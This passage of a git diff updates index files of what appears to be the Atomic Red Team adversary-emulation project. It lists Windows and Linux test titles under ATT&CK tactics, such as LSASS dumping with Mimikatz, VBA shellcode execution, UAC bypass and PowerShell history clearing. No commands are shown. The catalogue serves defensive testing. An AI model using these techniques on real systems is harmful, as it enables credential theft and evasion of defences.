Folder](../../T1547.001/T1547.001.md) - Atomic Test #1: Reg Key Run [windows] - Atomic Test #2: Reg Key RunOnce [windows] @@ -95,6 +234,7 @@ - Atomic Test #2: Scheduled task Local [windows] - Atomic Test #3: Scheduled task Remote [windows] - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] + - Atomic Test #5: Task Scheduler via VBA [windows] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.002 Screensaver](../../T1546.002/T1546.002.md) - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows] @@ -137,7 +277,7 @@ - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows] - T1027.001 Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md) +- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows] - Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows] - Atomic Test #3: Bypass UAC using Fodhelper [windows] @@ -153,6 +293,9 @@ - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] +- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md) + - Atomic Test #9: Prevent Powershell History Logging [windows] + - Atomic Test #10: Clear Powershell History by Deleting History File [windows] - [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md) - Atomic Test #1: Clear Logs [windows] - Atomic Test #2: Delete System Logs Using Clear-EventLog [windows] @@ -233,6 +376,7 @@ - Atomic Test #1: Hidden Window [windows] - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -324,8 +468,10 @@ - T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md) - Atomic Test #1: Process Hollowing using PowerShell [windows] + - Atomic Test #2: RunPE via VBA [windows] - [T1055 Process Injection](../../T1055/T1055.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] + - Atomic Test #2: Shellcode execution via VBA [windows] - [T1216.001 PubPrn](../../T1216.001/T1216.001.md) - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows] - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -372,6 +518,8 @@ - Atomic Test #3: Register-CimProvider - Execute evil dll [windows] - Atomic Test #4: InfDefaultInstall.exe .inf Execution [windows] - Atomic Test #5: ProtocolHandler.exe Downloaded a Suspicious File [windows] + - Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows] + - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows] - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md) - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows] - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows] @@ -397,7 +545,9 @@ - T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1218.012 Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1222.001 Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) - Atomic Test #1: Take ownership using takeown utility [windows] @@ -501,6 +651,7 @@ - [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) - Atomic Test #1: Append malicious start-process cmdlet [windows] - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) - Atomic Test #1: Reg Key Run [windows] @@ -515,6 +666,7 @@ - Atomic Test #2: Scheduled task Local [windows] - Atomic Test #3: Scheduled task Remote [windows] - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] + - Atomic Test #5: Task Scheduler via VBA [windows] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.002 Screensaver](../../T1546.002/T1546.002.md) - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows] @@ -766,56 +918,6 @@ - Atomic Test #2: Malicious User Agents - CMD [windows] - T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -# collection -- [T1560 Archive Collected Data](../../T1560/T1560.md) - - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows] -- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md) - - Atomic Test #1: Compress Data for Exfiltration With Rar [windows] - - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows] - - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows] - - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows] -- [T1123 Audio Capture](../../T1123/T1123.md) - - Atomic Test #1: using device audio capture commandlet [windows] -- [T1119 Automated Collection](../../T1119/T1119.md) - - Atomic Test #1: Automated Collection Command Prompt [windows] - - Atomic Test #2: Automated Collection PowerShell [windows] - - Atomic Test #3: Recon information for export with PowerShell [windows] - - Atomic Test #4: Recon information for export with Command Prompt [windows] -- [T1115 Clipboard Data](../../T1115/T1115.md) - - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows] - - Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows] -- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) - - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] -- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) - - Atomic Test #2: PowerShell - Prompt User for Password [windows] -- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1056.001 Keylogging](../../T1056.001/T1056.001.md) - - Atomic Test #1: Input Capture [windows] -- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md) - - Atomic Test #1: Stage data from Discovery.bat [windows] - - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows] -- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md) - - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows] -- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1113 Screen Capture](../../T1113/T1113.md) - - Atomic Test #5: Windows Screencapture [windows] -- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - # execution - [T1053.002 At (Windows)](../../T1053.002/T1053.002.md) - Atomic Test #1: At.exe Scheduled task [windows] @@ -865,6 +967,7 @@ - Atomic Test #2: Scheduled task Local [windows] - Atomic Test #3: Scheduled task Remote [windows] - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] + - Atomic Test #5: Task Scheduler via VBA [windows] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1569.002 Service Execution](../../T1569.002/T1569.002.md) @@ -877,6 +980,7 @@ - [T1059.005 Visual Basic](../../T1059.005/T1059.005.md) - Atomic Test #1: Visual Basic script execution to gather local computer information [windows] - Atomic Test #2: Encoded VBS code execution [windows] + - Atomic Test #3: Extract Memory via VBA [windows] - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) @@ -906,87 +1010,6 @@ - T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -# credential-access -- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) - - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] -- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) - - Atomic Test #3: Extracting passwords with findstr [windows] - - Atomic Test #4: Access unattend.xml [windows] -- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) - - Atomic Test #1: Run Chrome-password Collector [windows] - - Atomic Test #3: LaZagne - Credentials from Browser [windows] -- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md) - - Atomic Test #1: Enumeration for Credentials in Registry [windows] - - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows] -- T1003.006 DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) - - Atomic Test #2: PowerShell - Prompt User for Password [windows] -- T1558.001 Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md) - - Atomic Test #1: GPP Passwords (findstr) [windows] - - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows] -- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md) - - Atomic Test #1: Request for service tickets [windows] -- [T1056.001 Keylogging](../../T1056.001/T1056.001.md) - - Atomic Test #1: Input Capture [windows] -- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md) - - Atomic Test #1: Dumping LSA Secrets [windows] -- [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md) - - Atomic Test #1: Windows Credential Editor [windows] - - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows] - - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows] - - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows] - - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows] - - Atomic Test #6: Offline Credential Theft With Mimikatz [windows] - - Atomic Test #7: LSASS read with pypykatz [windows] -- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1003.003 NTDS](../../T1003.003/T1003.003.md) - - Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows] - - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows] - - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows] - - Atomic Test #4: Create Volume Shadow Copy with WMI [windows] - - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows] - - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows] -- [T1040 Network Sniffing](../../T1040/T1040.md) - - Atomic Test #3: Packet Capture Windows Command Prompt [windows] - - Atomic Test #4: Windows Internal Packet Capture [windows] -- [T1003 OS Credential Dumping](../../T1003/T1003.md) - - Atomic Test #1: Powershell Mimikatz [windows] - - Atomic Test #2: Gsecdump [windows] - - Atomic Test #3: Credential Dumping with NPPSpy [windows] -- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md) - - Atomic Test #1: Password Cracking with Hashcat [windows] -- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md) - - Atomic Test #1: Install and Register Password Filter DLL [windows] -- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md) - - Atomic Test #1: Brute Force Credentials [windows] -- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md) - - Atomic Test #1: Password Spray all Domain Users [windows] - - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows] -- [T1552.004 Private Keys](../../T1552.004/T1552.004.md) - - Atomic Test #1: Private Keys [windows] -- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) - - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows] - - Atomic Test #2: Registry parse with pypykatz [windows] - - Atomic Test #3: esentutl.exe SAM copy [windows] - - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows] -- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - # lateral-movement - T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md) diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 24b3b88f..bbd79b46 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md @@ -1,53 +1,63 @@ # Linux Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | -| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell](../../T1059.004/T1059.004.md) | [Cron](../../T1053.003/T1053.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or 